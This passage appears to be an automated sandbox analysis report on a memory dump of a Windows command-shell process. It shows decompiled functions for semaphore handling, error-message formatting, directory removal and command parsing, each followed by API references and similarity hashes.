0x00000000
0x003510f8
0x003510fa
0x003510fb
0x003510fe
0x00000000
0x00000000
0x00351109
0x00351110
0x00351115
0x00351117
0x00000000
0x00000000
0x0035111f
0x00000000
0x0035111f
0x003510f2
0x00339afc
0x00000000
0x00339c25
0x00339c25
0x00339c28
0x00000000
0x00000000
0x00339c2e
0x00339c30
0x00000000
0x00000000
0x00000000
0x00339c36
0x00339c41
0x00339c41
0x00000000
0x00339c41
0x00339a8f
0x00339a8a

APIs

_wcsicmp.MSVCRT ref: 00339A36
_wcsicmp.MSVCRT ref: 00339A99
_wcsicmp.MSVCRT ref: 00339AB3
_wcsicmp.MSVCRT ref: 00339ACD
_wcsicmp.MSVCRT ref: 00339AE7
iswspace.MSVCRT ref: 00339B1F

Strings

FOR/?, xrefs: 00339A2F
=,;, xrefs: 00339B35

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsicmp$iswspace
String ID: =,;$FOR/?
API String ID: 759518647-2121398454
Opcode ID: df41b89f67d1f8f55afc6753596237dc32c02cf1b6255980398c27b8814b9d82
Instruction ID: 597c85f6379fa8175e816baab25aa71d17e65a96a289bcf851d2cc7d4f963749
Opcode Fuzzy Hash: df41b89f67d1f8f55afc6753596237dc32c02cf1b6255980398c27b8814b9d82
Instruction Fuzzy Hash: 1261F831204741CEEB3BA775FCC6B7663A4EB80711F11952FE5478A9E1DAF09885CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0035213A, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0035213A(void* __ecx, intOrPtr* __edx) {
				void* _v0;
				long _v8;
				long _v12;
				long _t11;
				void* _t16;
				long _t18;
				intOrPtr* _t41;
				void* _t44;

				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_t41 = __edx;
				_t11 = WaitForSingleObject(__ecx, 0);
				if(_t11 != 0xffffffff) {
					if(_t11 == 0 || _t11 == 0x102) {
						_v8 = 0;
						if(_t11 != 0) {
							_v12 = 0;
							if(ReleaseSemaphore(_t44, 1,  &_v12) != 0) {
								if(_v12 == 0) {
									if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
										goto L24;
									} else {
										_t18 = WaitForSingleObject(_t44, 0);
										if(_t18 != 0xffffffff) {
											if(_t18 == 0) {
												goto L22;
											} else {
												goto L24;
											}
										} else {
											goto L2;
										}
									}
								} else {
									goto L24;
								}
							} else {
								goto L2;
							}
						} else {
							if(ReleaseSemaphore(_t44, 1,  &_v8) != 0) {
								_v8 = _v8 + 1;
								if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
									goto L24;
								} else {
									L22:
									 *_t41 = _v8;
									_t16 = 0;
								}
							} else {
								goto L2;
							}
						}
					} else {
						L24:
						E0035292C("wil", 0x8000ffff);
						_t16 = 0x8000ffff;
					}
				} else {
					L2:
					_t16 = E00352913("wil");
				}
				return _t16;
			}

0x0035213f
0x00352140
0x00352146
0x0035214a
0x0035214c
0x00352155
0x00352170
0x00352183
0x00352188
0x003521ca
0x003521d9
0x003521e8
0x003521fd
0x00000000
0x0035220c
0x0035220e
0x00352217
0x00352225
0x00000000
0x00352227
0x00000000
0x00352227
0x00352219
0x00000000
0x00352219
0x00352217
0x003521ea
0x00000000
0x003521ea
0x003521db
0x00000000
0x003521db
0x0035218a
0x00352199
0x003521a2
0x003521b1
0x00000000
0x0035222e
0x0035222e
0x00352231
0x00352233
0x00352233
0x0035219b
0x00000000
0x0035219b
0x00352199
0x00352179
0x0035223c
0x0035224a
0x0035224f
0x0035224f
0x00352157
0x0035215c
0x00352164
0x00352164
0x00352257

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,?,00000000,?,00000000,00000000,?,00352CF5), ref: 0035214C

Strings

wil, xrefs: 0035215F, 00352245

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait
String ID: wil
API String ID: 24740636-1589926490
Opcode ID: 26fe82e112c1c620e89919e18a5aa1bf2e83c75e1f3106ee8f19d9931b046d98
Instruction ID: 5c630385aaa267764b6be55ebdd8e59ca6b3c443e42017edda9af0fbe43b4279
Opcode Fuzzy Hash: 26fe82e112c1c620e89919e18a5aa1bf2e83c75e1f3106ee8f19d9931b046d98
Instruction Fuzzy Hash: 0631F139700208BBEB235AA1DC84FBB362DDF43312F204532FE05D66A0D770CE4A9662

Uniqueness

Uniqueness Score: -1.00%

Function 00357C83, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 91
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00357C83(void* __ebx, intOrPtr __edx, intOrPtr _a4, long _a8, char _a16) {
				signed int _v12;
				char _v44;
				short _v112;
				short _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				void* __edi;
				void* __esi;
				signed int _t24;
				long _t29;
				void* _t33;
				signed int _t38;
				char* _t43;
				long _t46;
				void* _t47;
				intOrPtr _t59;
				signed int _t60;

				_t56 = __edx;
				_t47 = __ebx;
				_t24 =  *0x35d0b4; // 0xd59bd0e8
				_v12 = _t24 ^ _t60;
				_t59 = _a4;
				_v120 =  &_a16;
				_v116 = 0;
				_t29 = FormatMessageW(0x1900, 0, _a8, 0,  &_v116, 0xa,  &_v120);
				_v120 = 0;
				if(_t29 != 0) {
					L5:
					E00346B76(_t59, L"%s", _v116);
					_t56 =  *((intOrPtr*)(_t59 + 0x10));
					if(E0033BED7(_t59,  *((intOrPtr*)(_t59 + 0x10))) != 0) {
						E0033B6CB(_t59);
					}
					LocalFree(_v116);
					_t33 = 0;
				} else {
					__imp___ultoa(_a8,  &_v44, 0x10);
					_t38 = E00340638(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(0,  ~( ~_t38),  &_v44, 0xffffffff,  &_v112, 0x20);
					_v128 =  &_v112;
					_t43 = L"Application";
					if(_a8 < 0x2328) {
						_t43 = L"System";
					}
					_v124 = _t43;
					_t46 = FormatMessageW(0x3100, 0, 0x13d, 0,  &_v116, 0xa,  &_v128);
					if(_t46 != 0) {
						goto L5;
					} else {
						_t33 = _t46 + 1;
					}
				}
				return E00346FD0(_t33, _t47, _v12 ^ _t60, _t56, 0, _t59);
			}

0x00357c83
0x00357c83
0x00357c8b
0x00357c92
0x00357c96
0x00357c9d
0x00357ca5
0x00357cb9
0x00357cbf
0x00357cc4
0x00357d3e
0x00357d48
0x00357d4d
0x00357d59
0x00357d5d
0x00357d5d
0x00357d65
0x00357d6b
0x00357cc6
0x00357ccf
0x00357ce0
0x00357cef
0x00357cf9
0x00357d09
0x00357d0c
0x00357d11
0x00357d13
0x00357d13
0x00357d18
0x00357d31
0x00357d39
0x00000000
0x00357d3b
0x00357d3b
0x00357d3b
0x00357d39
0x00357d7c

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000104,00000000,?,0000000A,?,?,?), ref: 00357CB9
_ultoa.MSVCRT ref: 00357CCF
GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00357CD8
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,0035A21D,000000FF,?,00000020), ref: 00357CF9
FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 00357D31
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 00357D65

Strings

Application, xrefs: 00357D0C
System, xrefs: 00357D13
(#, xrefs: 00357CFF

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
String ID: (#$Application$System
API String ID: 3377411628-593978566
Opcode ID: 09128fdf2f7b0c93429af8e45a0c22897f2c0945ca67cfc8ab79e398fb25fc30
Instruction ID: 136bfd5584e13322462178aeb24ba0b6978ca8c9b73818f0cacb2bf07a6630db
Opcode Fuzzy Hash: 09128fdf2f7b0c93429af8e45a0c22897f2c0945ca67cfc8ab79e398fb25fc30
Instruction Fuzzy Hash: 57314371A0020CAFDB229F65DC45EEEB7BDEF89711F104229F915EB191E7309905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00338885, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00338885(WCHAR* __ecx) {
				signed int _v8;
				short _v12;
				short _v14;
				short _v16;
				WCHAR* _v20;
				void* __edi;
				void* __esi;
				signed int _t8;
				long _t15;
				signed int _t17;
				void* _t22;
				void* _t26;
				WCHAR* _t27;
				long _t28;
				signed int _t29;

				_t8 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t8 ^ _t29;
				_t27 = __ecx;
				_t28 = 0;
				if(GetFullPathNameW(__ecx, 4,  &_v16,  &_v20) == 3) {
					if(_v14 != 0x3a || _v12 != 0x5c) {
						goto L1;
					} else {
						_t15 = 0;
						L3:
						return E00346FD0(_t15, _t22, _v8 ^ _t29, _t26, _t27, _t28);
					}
				}
				L1:
				if(RemoveDirectoryW(_t27) == 0) {
					_t28 = GetLastError();
					if(_t28 == 5) {
						_t17 = GetFileAttributesW(_t27);
						if(_t17 != 0xffffffff && (_t17 & 0x00000001) != 0 && SetFileAttributesW(_t27, _t17 & 0xfffffffe) != 0) {
							if(RemoveDirectoryW(_t27) == 0) {
								_t28 = GetLastError();
							} else {
								_t28 = 0;
							}
						}
					}
				}
				_t15 = _t28;
				goto L3;
			}

0x0033888d
0x00338894
0x0033889c
0x003388a2
0x003388b1
0x00350638
0x00000000
0x00350649
0x00350649
0x003388c8
0x003388d7
0x003388d7
0x00350638
0x003388b7
0x003388c0
0x00350656
0x0035065b
0x00350662
0x0035066b
0x00350695
0x003506a4
0x00350697
0x00350697
0x00350697
0x00350695
0x0035066b
0x0035065b
0x003388c6
0x00000000

APIs

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,?,00000000,?,?,00338857,-00000105), ref: 003388A8
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,00338857,-00000105), ref: 003388B8
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,00338857,-00000105), ref: 00350650
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,?,00000000,?,?,00338857,-00000105), ref: 00350662
SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,00338857,-00000105), ref: 0035067E
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,00338857,-00000105), ref: 0035068D

Strings

\, xrefs: 0035063E
:, xrefs: 00350633

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
String ID: :$\
API String ID: 3961617410-1166558509
Opcode ID: ef714c2a404aa1047bb6f1a85cb5c02285baa3345520cf4d84e2208292da4477
Instruction ID: eff4e55cde6672d7c071bb73e67dc757fc45ba468dee4f65c3cc9e73c56c69dd
Opcode Fuzzy Hash: ef714c2a404aa1047bb6f1a85cb5c02285baa3345520cf4d84e2208292da4477
Instruction Fuzzy Hash: CB11E331A10214AB8733AF789C88A7EB7FCEB85760F510269F816E7190DF308D45C1A1

Uniqueness

Uniqueness Score: -1.00%

Function 00342DD2, Relevance: 15.4, APIs: 10, Instructions: 400
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00342DD2(signed char* __ecx, signed int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1092;
				char _v1096;
				int _v1100;
				void _v1620;
				int _v1628;
				char _v1632;
				int _v1636;
				void _v2156;
				signed int _v2160;
				signed int _v2164;
				signed int _v2168;
				int _v2172;
				signed int _v2176;
				intOrPtr* _v2180;
				signed char* _v2184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t132;
				signed int _t149;
				void* _t169;
				signed int _t171;
				signed int _t181;
				signed int _t182;
				void* _t184;
				signed int _t185;
				signed int _t187;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t195;
				signed int _t201;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				intOrPtr _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t222;
				void* _t243;
				signed int _t245;
				signed int _t248;
				signed int _t265;
				void* _t271;
				signed int _t278;
				signed int _t280;
				intOrPtr* _t282;
				signed int _t284;
				signed char* _t285;
				intOrPtr* _t286;
				signed int _t289;

				_t277 = __edx;
				_t132 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t132 ^ _t289;
				_t287 = 0x104;
				_v2164 = 1;
				_t222 = 0;
				_v24 = 1;
				_v2172 = 0;
				_t285 = __ecx;
				_v28 = 0;
				_v2184 = __ecx;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_v1636 = 0;
				_v1632 = 1;
				_v1628 = 0x104;
				memset( &_v2156, 0, 0x104);
				_v564 = 0;
				_v560 = 1;
				_v556 = 0x104;
				memset( &_v1084, 0, 0x104);
				_v1100 = 0;
				_v1096 = 1;
				_v1092 = 0x104;
				memset( &_v1620, 0, 0x104);
				if(E00340C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00340C70( &_v2156, ((0 | _v1632 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00340C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L10:
					_t149 = 1;
					goto L11;
				} else {
					_t169 = E00340C70( &_v1620, ((0 | _v1096 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
					_t302 = _t169;
					if(_t169 < 0 || E00344E94( &_v2176, _t277, _t302) == 1) {
						goto L10;
					} else {
						_t287 = _v2176;
						_t171 =  *_t285;
						if( *_t287 == 0) {
							_t171 = _t171 & 0xfffffff7;
							 *_t285 = _t171;
						}
						if((_t171 & 0x00000008) != 0) {
							 *((intOrPtr*)(_t287 + 0x24)) =  *((intOrPtr*)(_t287 + 0x1c)) - 1;
							_t171 =  *_t285;
						}
						if((_t171 & 0x00000200) != 0) {
							 *_t285 = _t171 | 0x00000004;
						}
						 *0x373cf0 = _t222;
						_t277 = 1;
						if(E00344800(_t285, 1, 1,  &_v2160) != 1) {
							_v2168 = _t222;
							E00340D89(1, 0x3324ac);
							E00340D89(1, 0x3324ac);
							_t222 = _v2160;
							while(1) {
								__eflags = _t222;
								if(_t222 == 0) {
									break;
								}
								E00340D89(_t277,  *(_t222 + 4));
								__eflags =  *((char*)(_t222 + 0x10));
								_t181 =  *_t285;
								if( *((char*)(_t222 + 0x10)) != 0) {
									_t181 = _t181 | 0x00000100;
									 *_t285 = _t181;
									__eflags = _t285[0x5c];
									if(_t285[0x5c] == 0) {
										L18:
										__eflags = _t181 & 0x00000040;
										if((_t181 & 0x00000040) == 0) {
											_t182 = _v28;
											__eflags = _t182;
											if(_t182 == 0) {
												_t182 =  &_v548;
											}
											E00340D89(_t277, _t182);
											_t278 =  *(_t222 + 4);
											_t243 = _t278 + 2;
											do {
												_t184 =  *_t278;
												_t278 = _t278 + 2;
												__eflags = _t184 - _v2172;
											} while (_t184 != _v2172);
											_t185 = _v28;
											_t280 = _t278 - _t243 >> 1;
											__eflags = _t185;
											if(_t185 == 0) {
												_t185 =  &_v548;
											}
											_t277 = _t280 + 1;
											E00344C89( *(_t222 + 4), _t280 + 1, _t185, _v20);
											_t245 = _v1636;
											__eflags = _t245;
											if(_t245 == 0) {
												_t245 =  &_v2156;
											}
											_t187 = _v28;
											__eflags = _t187;
											if(_t187 == 0) {
												_t187 =  &_v548;
											}
											__imp___wcsicmp(_t187, _t245);
											__eflags = _t187;
											if(_t187 == 0) {
												goto L19;
											} else {
												__eflags = _v2168;
												if(_v2168 == 0) {
													L48:
													_t277 =  *(_t222 + 4);
													_t219 = E0035A834(_t287,  *(_t222 + 4));
													__eflags = _t219;
													if(_t219 != 0) {
														goto L10;
													}
													goto L19;
												}
												_t220 = E0033B610(_t222, _t287, _t285);
												__eflags = _t220;
												if(_t220 != 0) {
													goto L10;
												}
												goto L48;
											}
										}
										L19:
										_t248 =  *_t285;
										_t285[0x64] = 0;
										_t285[0x60] = 0;
										_t285[0x68] = 0;
										_t191 = (_t248 & 0x00000010 | 0x00000020) >> 4;
										_t285[0x6c] = 0;
										__eflags = _t248 & 0x00020400;
										if((_t248 & 0x00020400) != 0) {
											_t191 = _t191 | 0x00000004;
										}
										asm("sbb ecx, ecx");
										_t277 = _t287;
										_t253 = _t222;
										_t192 = E00345266(_t222, _t287, _t285[4], _t285[8], _t191, _t285, 0, E003465F0,  !( ~(_t248 & 0x00004004)) & E00346550, E003464F0);
										_v2164 = _t192;
										__eflags = _t192;
										if(_t192 != 0) {
											L70:
											__eflags =  *0x35d544;
											if( *0x35d544 != 0) {
												goto L23;
											}
											__eflags = _t192 - 5;
											if(_t192 != 5) {
												__eflags = _t285[0x60] + _t285[0x64];
												if(_t285[0x60] + _t285[0x64] != 0) {
													goto L23;
												}
												E0033B6CB(_t287);
												__eflags = 0;
												_push(0);
												_push(0x40002711);
												E0033C5A2(_t287);
												_v2164 = 1;
												L75:
												goto L23;
											}
											_push(0);
											_push(5);
											E0033C5A2(_t253);
											goto L75;
										} else {
											__eflags = _t285[0x60] + _t285[0x64];
											if(_t285[0x60] + _t285[0x64] == 0) {
												_t192 = _v2164;
												goto L70;
											}
											__eflags =  *_t285 & 0x00000040;
											if(( *_t285 & 0x00000040) == 0) {
												E00340D89(_t277, 0x3324ac);
												_t212 =  *_t222;
												__eflags = _t212;
												if(_t212 == 0) {
													L57:
													_t265 = _v28;
													__eflags = _t265;
													if(_t265 == 0) {
														_t265 =  &_v548;
													}
													_t213 = _v564;
													__eflags = _t213;
													if(_t213 == 0) {
														_t213 =  &_v1084;
													}
													__imp___wcsicmp(_t213, _t265);
													__eflags = _t213;
													if(_t213 == 0) {
														goto L23;
													} else {
														__eflags =  *_t285 & 0x00000010;
														if(( *_t285 & 0x00000010) == 0) {
															L65:
															_t277 = _v1100;
															__eflags = _v1100;
															if(__eflags == 0) {
																_t277 =  &_v1620;
															}
															_t149 = E0035A0D2(_t287, _t277, __eflags,  *_t285, _t285[0x64]);
															__eflags = _t149;
															if(_t149 != 0) {
																L11:
																_v2164 = _t149;
																L12:
																__imp__??_V@YAXPAX@Z(_v1100);
																__imp__??_V@YAXPAX@Z(_v564);
																__imp__??_V@YAXPAX@Z(_v1636);
																__imp__??_V@YAXPAX@Z();
																return E00346FD0(_v2164, _t222, _v8 ^ _t289, _t277, _t285, _t287, _v28);
															} else {
																goto L23;
															}
														}
														_t149 = E0033B610(_t222, _t287, _t285);
														__eflags = _t149;
														if(__eflags != 0) {
															goto L11;
														}
														_t277 = _t285[0x60];
														_t149 = E0035A7F6(_t222, _t287, _t285[0x60], __eflags,  &(_t285[0x68]),  *_t285);
														__eflags = _t149;
														if(_t149 != 0) {
															goto L11;
														}
														goto L65;
													}
												}
												_t215 =  *((intOrPtr*)(_t212 + 4));
												_t282 = _t215;
												_v2160 = _t215;
												_t271 = _t282 + 2;
												do {
													_t216 =  *_t282;
													_t282 = _t282 + 2;
													__eflags = _t216 - _v2172;
												} while (_t216 != _v2172);
												_t217 = _v564;
												_t284 = _t282 - _t271 >> 1;
												__eflags = _t217;
												if(_t217 == 0) {
													_t217 =  &_v1084;
												}
												_t277 = _t284 + 1;
												__eflags = _t284 + 1;
												E00344C89(_v2160, _t284 + 1, _t217, _v556);
												goto L57;
											}
											L23:
											E00340040( *(_t222 + 4));
											_t194 =  *((intOrPtr*)(_t222 + 0xc));
											_v2180 = _t194;
											_v2160 = 1;
											__eflags =  *((intOrPtr*)(_t222 + 8)) - 1;
											if( *((intOrPtr*)(_t222 + 8)) < 1) {
												L27:
												_t195 = _v2168;
												__eflags = _t195;
												if(_t195 != 0) {
													E00340040(_t195);
												}
												_v2168 = _t222;
												_t222 =  *_t222;
												continue;
											}
											_t286 = _t194;
											do {
												E00340040( *_t286);
												E00340040( *((intOrPtr*)(_t286 + 4)));
												E00340040(_t286);
												_t286 =  *((intOrPtr*)(_t286 + 0xc));
												_t201 = _v2160 + 1;
												_v2160 = _t201;
												__eflags = _t201 -  *((intOrPtr*)(_t222 + 8));
											} while (_t201 <=  *((intOrPtr*)(_t222 + 8)));
											_t285 = _v2184;
											_t287 = _v2176;
											goto L27;
										}
									}
									_push(0);
									_push(0x40002713);
									E0033C5A2(0);
									goto L10;
								}
								__eflags = _t181 & 0x00020000;
								if((_t181 & 0x00020000) == 0) {
									_t181 = _t181 | 0x00000002;
									__eflags = _t181;
									 *_t285 = _t181;
								}
								goto L18;
							}
							E0033B6CB(_t287);
							goto L12;
						} else {
							goto L10;
						}
					}
				}
			}

0x00342dd2
0x00342ddd
0x00342de4
0x00342dea
0x00342def
0x00342df9
0x00342dfb
0x00342e06
0x00342e0c
0x00342e0e
0x00342e13
0x00342e19
0x00342e1c
0x00342e24
0x00342e30
0x00342e37
0x00342e40
0x00342e48
0x00342e54
0x00342e5b
0x00342e64
0x00342e6c
0x00342e78
0x00342e7f
0x00342e88
0x00342eae
0x00342f72
0x00342f74
0x00000000
0x00342efe
0x00342f18
0x00342f1d
0x00342f1f
0x00000000
0x00342f31
0x00342f31
0x00342f37
0x00342f3b
0x00342f3d
0x00342f40
0x00342f40
0x00342f44
0x0034d999
0x0034d99c
0x0034d99c
0x00342f4f
0x0034d9a6
0x0034d9a6
0x00342f5b
0x00342f64
0x00342f70
0x00342fc3
0x00342fd5
0x00342fe1
0x00342fe6
0x00342fec
0x00342fec
0x00342fee
0x00000000
0x00000000
0x00342ffd
0x00343002
0x00343006
0x00343008
0x0034d9ad
0x0034d9b4
0x0034d9b6
0x0034d9b9
0x0034301a
0x0034301a
0x0034301c
0x0034d9d1
0x0034d9d4
0x0034d9d6
0x0034d9d8
0x0034d9d8
0x0034d9e5
0x0034d9ea
0x0034d9ed
0x0034d9f0
0x0034d9f0
0x0034d9f3
0x0034d9f6
0x0034d9f6
0x0034d9ff
0x0034da04
0x0034da06
0x0034da08
0x0034da0a
0x0034da0a
0x0034da16
0x0034da18
0x0034da1d
0x0034da23
0x0034da25
0x0034da27
0x0034da27
0x0034da2d
0x0034da30
0x0034da32
0x0034da34
0x0034da34
0x0034da3c
0x0034da44
0x0034da46
0x00000000
0x0034da4c
0x0034da4c
0x0034da53
0x0034da64
0x0034da64
0x0034da69
0x0034da6e
0x0034da70
0x00000000
0x00000000
0x00000000
0x0034da76
0x0034da57
0x0034da5c
0x0034da5e
0x00000000
0x00000000
0x00000000
0x0034da5e
0x0034da46
0x00343022
0x00343022
0x00343028
0x0034302e
0x00343034
0x00343037
0x0034303a
0x0034303d
0x00343043
0x0034da7b
0x0034da7b
0x00343056
0x0034306c
0x0034306e
0x00343073
0x00343078
0x0034307e
0x00343080
0x0034db67
0x0034db67
0x0034db6e
0x00000000
0x00000000
0x0034db74
0x0034db77
0x0034db88
0x0034db8b
0x00000000
0x00000000
0x0034db93
0x0034db98
0x0034db9a
0x0034db9b
0x0034dba0
0x0034dba5
0x0034dbaf
0x00000000
0x0034dbb0
0x0034db7b
0x0034db7c
0x0034db7e
0x00000000
0x00343086
0x00343089
0x0034308c
0x0034db61
0x00000000
0x0034db61
0x00343092
0x00343095
0x0034da8e
0x0034da93
0x0034da95
0x0034da97
0x0034dadd
0x0034dadd
0x0034dae0
0x0034dae2
0x0034dae4
0x0034dae4
0x0034daea
0x0034daf0
0x0034daf2
0x0034daf4
0x0034daf4
0x0034dafc
0x0034db04
0x0034db06
0x00000000
0x0034db0c
0x0034db0c
0x0034db0f
0x0034db38
0x0034db38
0x0034db3e
0x0034db40
0x0034db42
0x0034db42
0x0034db4f
0x0034db54
0x0034db56
0x00342f75
0x00342f75
0x00342f7b
0x00342f81
0x00342f8e
0x00342f9b
0x00342fa5
0x00342fc2
0x0034db5c
0x00000000
0x0034db5c
0x0034db56
0x0034db13
0x0034db18
0x0034db1a
0x00000000
0x00000000
0x0034db22
0x0034db2b
0x0034db30
0x0034db32
0x00000000
0x00000000
0x00000000
0x0034db32
0x0034db06
0x0034da99
0x0034da9c
0x0034da9e
0x0034daa4
0x0034daa7
0x0034daa7
0x0034daaa
0x0034daad
0x0034daad
0x0034dab6
0x0034dabe
0x0034dac0
0x0034dac2
0x0034dac4
0x0034dac4
0x0034dad6
0x0034dad6
0x0034dad8
0x00000000
0x0034dad8
0x0034309b
0x0034309e
0x003430a3
0x003430a9
0x003430af
0x003430b5
0x003430b8
0x003430f5
0x003430f5
0x003430fb
0x003430fd
0x0034311a
0x0034311a
0x003430ff
0x00343105
0x00000000
0x00343105
0x003430ba
0x003430bc
0x003430c1
0x003430c9
0x003430d0
0x003430db
0x003430dd
0x003430de
0x003430e4
0x003430e4
0x003430e9
0x003430ef
0x00000000
0x003430ef
0x00343080
0x0034d9bf
0x0034d9c0
0x0034d9c5
0x00000000
0x0034d9cb
0x0034300e
0x00343013
0x00343015
0x00343015
0x00343018
0x00343018
0x00000000
0x00343013
0x0034310e
0x00000000
0x00000000
0x00000000
0x00000000
0x00342f70
0x00342f1f

APIs

memset.MSVCRT ref: 00342E1C
memset.MSVCRT ref: 00342E40
memset.MSVCRT ref: 00342E64
memset.MSVCRT ref: 00342E88

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

??_V@YAXPAX@Z.MSVCRT ref: 00342F81
??_V@YAXPAX@Z.MSVCRT ref: 00342F8E
??_V@YAXPAX@Z.MSVCRT ref: 00342F9B
??_V@YAXPAX@Z.MSVCRT ref: 00342FA5

Part of subcall function 00344E94: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00342F2C,-00000001,-00000001,-00000001,-00000001), ref: 00344ED6

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$BufferConsoleInfoScreen
String ID:
API String ID: 1034426908-0
Opcode ID: 7fc420c0f0dc5389b421d0eeaedb67fa5a253714629be5ca2996eeb163fcca94
Instruction ID: 8e31853b5d9864ed6b8e1f5d31292fc7c048380ab716c94fa9e0730df98be866
Opcode Fuzzy Hash: 7fc420c0f0dc5389b421d0eeaedb67fa5a253714629be5ca2996eeb163fcca94
Instruction Fuzzy Hash: 8AE19071A002199BDB26DF65CC85BAAB7F8FF44314F1441A9E949AB241DB31FE84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0033BF30, Relevance: 15.3, APIs: 10, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0033BF30(short* __edx, WCHAR* _a4) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				WCHAR* _v552;
				short* _v556;
				short* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				void* _t49;
				long _t59;
				struct _SECURITY_ATTRIBUTES* _t61;
				WCHAR* _t63;
				long _t64;
				WCHAR* _t67;
				WCHAR* _t68;
				WCHAR* _t69;
				signed int _t70;
				signed int _t71;
				short* _t73;
				void* _t74;
				WCHAR* _t76;
				WCHAR* _t80;
				signed int _t81;
				signed int _t82;
				struct _SECURITY_ATTRIBUTES* _t86;
				signed int _t88;
				short* _t89;
				signed int _t97;
				short* _t100;
				WCHAR* _t101;
				WCHAR* _t103;
				WCHAR* _t104;
				struct _SECURITY_ATTRIBUTES* _t105;
				void* _t106;
				signed int _t107;

				_t100 = __edx;
				_t47 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t47 ^ _t107;
				_t104 = _a4;
				_t49 = 0x3a;
				if(_t104[1] != _t49) {
					L2:
					_t105 = 0;
					_v20 = 0x104;
					_v28 = 0;
					_t86 = 1;
					_v24 = 1;
					memset( &_v548, 0, 0x104);
					_t91 =  &_v548;
					if(E00340C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						_t59 = 8;
						L39:
						_push(_t105);
						_push(_t59);
						L40:
						E0033C5A2(_t91);
						L8:
						_t105 = _t86;
						L9:
